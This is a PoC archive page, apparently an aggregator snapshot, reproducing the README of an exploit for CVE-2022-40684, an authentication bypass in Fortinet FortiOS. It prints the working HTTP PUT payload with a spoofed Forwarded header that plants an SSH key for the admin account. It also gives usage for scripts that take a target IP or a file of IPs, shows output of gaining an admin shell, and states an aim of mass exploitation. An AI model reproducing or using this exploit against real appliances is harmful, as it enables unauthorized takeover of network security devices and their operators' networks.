Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-40684 PoC — Fortinet FortiOS 授权问题漏洞

Source
Associated Vulnerability
Title:Fortinet FortiOS 授权问题漏洞 (CVE-2022-40684)
Description:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS存在授权问题漏洞。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
Readme
# CVE-2022-40684 by 1vere$k

For now it's a POC copy for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.  
Coppied from https://github.com/horizon3ai/CVE-2022-40684

## Analysis

The exploit uses the simple payload:  
```
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }
```

## Summary

This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.

## Future Plans

Develop it for a full scale exploit with multi-targets and multi-servers for mass exploit.

## CLI Usage

```
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>
```
Example:  
`./cve-2022-40684.sh ips.txt`

## PyUsage
`python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub`  
The example:  

```
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
```
File Snapshot

[4.0K] /data/pocs/2b9c82797e14792c87a441bdd00db609e1187110 ├── [2.0K] cve-2022-40684.py ├── [ 270] ip-pack.sh └── [1.5K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.